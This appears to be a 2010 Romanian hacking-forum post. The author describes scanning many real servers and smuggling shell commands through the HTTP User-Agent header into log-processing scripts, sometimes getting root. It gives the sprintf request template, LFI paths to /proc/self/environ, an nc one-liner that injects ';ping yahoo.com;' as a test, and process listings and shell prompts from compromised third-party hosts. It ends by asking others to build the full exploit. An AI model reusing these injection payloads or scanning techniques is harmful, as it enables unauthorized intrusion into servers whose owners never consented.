0day sys logd,repository,awstats,rotatelogs

[UstupidMF]

Asa,de vreo 2 saptamani ma tot chinui cu cgiscanul meu si cu lfi-urile,mi-am pus la misto in sprintf(get,"GET %s%s HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ystem(\'cd etc ... r\nHost: %s\r\nConnection: Close\r\n\r\n",dir,file,ip);

si am inceput sa dau dupa tot felu de lfi-uri,imediat ce am dat drumu la scan,am vazut ca-mi vin multe servere cu uid0 ,foarte ciudat,m-am tot uitat prin ele,sa inteleg care-i faza,cum de-mi vin direct root

M-a bagat mai rau in ceata

6788 ? S 0:00 /realsentry/wsp/gui/interface/bin/wsp-gui -k restart

9573 ? Ss 0:00 /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php

9814 ? SN 0:00 sh -c php /realsentry/wsp/gui/core/tools_system/send_syslog.php '[bLOCKED INTERNAL][2581809048] : 2010/06/21 18:44:01 - HEADER(3): User-Agent = ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)'

asta a fost 1 bug

21130 ? S 0:01 /usr/bin/perl -w /var/log/apache2/folderize /var/log/apache2

10573 ? S 0:00 sh -c echo '74.54.0.0 - - [21/Jun/2010:19:18:59 +0200] "GET HTTP/1.1 HTTP/1.1" 400 351 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"' >> "/var/log/apache2/vhost_ip.log"sh-2.05b# sent 32, rcvd 10248

al doilea

2029 ? S 0:00 /usr/bin/perl /usr/imjm/scripts/access2msg.pl

2031 ? S 14:54 /usr/bin/perl /usr/imjm/scripts/access2msg_healthcheck.pl

2032 ? S 6:57 /usr/bin/perl /usr/imjm/scripts/access2msg_localhost.pl

2350 ? S 0:00 sh -c echo '94.199.0.0 - - [20/Jun/2010:02:39:28 +0900] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 403 211 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 124.110.94.18 80 983 -' >> /tmp/access_count/mon_err_log_localhost

al treilea

cat /proc/2733/cmdline

sh-cecho '74.54.0.0 - - [21/Jun/2010:23:45:22 +0900] "GET /index.php?mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 281 "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" - -' >> /tmp/access_count/accesslog

asta m-a speriat

25977 ? SN 0:00 sh -c /bin/bash -c 'CL="0"; CT=0; for ((i=0;i<=128;i++)); do if [ -z "$(sudo mpt-status -i $i -s 2>&1 | egrep "no SCSI disks attached|mptctl")" ]; then let CT=$CT+$(sudo mpt-status -i $i -s | egrep -v "(OPTIMAL|ONLINE)" | wc -l); CL="1"; fi; done; ([ "${CL}" -eq "0" ] && echo 1) || echo ${CT}'

24728 ? D 0:08 /usr/bin/webalizer -c /var/www/web33/.configs/webalizer.conf

19858 ? Ss 0:00 /bin/bash -c /usr/share/confixx/runwebalizer.sh

am tzipat repede dupa buffer sa ma ajute si am gasit alt bug

echo -n -e "GET / HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ';ping yahoo.com;'\r\nHost: ip atacat\r\n\r\n" |nc ip atacat 80

sigur este o vulnerabilitate care sa se lege de toate,doar ca nu sunt eu in stare s-o gasesc m-au zapacit de tot,daca avetzi vreo idee si vretzi mai multe detalii,lasati-mi un msg

realsentry/wsp/tools/php/php /realsentry/wsp/gui/core/parser/parser.php 1 idi1 graceful Warning: fopen(/dev/fd/0): failed to open stream: No such device or address in /realsentry/wsp/gui/core/parser/parser.php on line 12

/dev/fd/0

/realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php od[2010/06/21 18:58:33][10825] [iNFO] SUPERD: Resuming normal operation (pid 10825) [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Security database clean up. [2010/06/21 18:58:33][10825] [iNFO] SUPERD: No logs security found [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check disks status. [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check the size of log files with no rotation configured. /bin/sh: line 6: 10825 Killed /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php

/usr/bin/perl /usr/imjm/scripts/access2msg_md.pl

/bin/sh /command/svscanboot

$outpath = "/tmp/access_count";

if( ! mkdir( $work ) ){ unlink( $pidfile ) or &logger( "WAR: Can't remove $pidfile" ); &error_exit( $@, "WAR: Can't make $work" ); } chmod( 0711, $work ); chown( "root", "pf", $work ); }

ls -all /tmp/access_count/accesslog -rw-r--r-- 1 red swing 0 Jun 22 02:57 /tmp/access_count/accesslog

2.4.21-37.EL #1 Wed Sep 7 13:35:21 EDT 2005 i686 i686 i386 GNU/Linux uid=1000(red) gid=1000(swing) groups=1000(swing) sh: no job control in this shell sh-2.05b$

Nu fiti tzarani sa tzinetzi pt voi,sper c-o sa primesc un msg cu sploitul dezvoltat

Credits xbuffer and me

[0] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php [1] => -e [2] => 7iBoxCron.Exec; ) _SERVER["argc"] => 3 _ENV["SHELL"] => /bin/sh _ENV["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin _ENV["PWD"] => /root _ENV["LANG"] => en_US.ISO-8859-15 _ENV["SHLVL"] => 1 _ENV["HOME"] => /root _ENV["LOGNAME"] => root _ENV["_"] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php

_GET["SessionProcess"] => 7iExecMain.php _GET["SessionPriority"] => High _GET["SessionId"] => a9627114cdf99d5be8547af0d51d1daa _GET["Download"] => 0 _GET["DownloadFile"] => _GET["SessionEvalstring"] => ; include_once('/opt/7i/lib/_Bin/_1a_Controller/_Controller/_controllermain.inc'); _ControllerMain('0','a9627114cdf99d5be8547af0d51d1daa','','',$_COOKIE,$_ENV,$_FILES,$_GET,$_POST,@$GLOBALS['HTTP_RAW_POST_DATA'],$_SERVER,'',''); _SERVER["SHELL"] => /bin/sh _SERVER["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

Edited June 25, 2010 by UstupidMF

[Guest Nemessis]

Mai traiesti bre? Kiss Goofy din partea mea.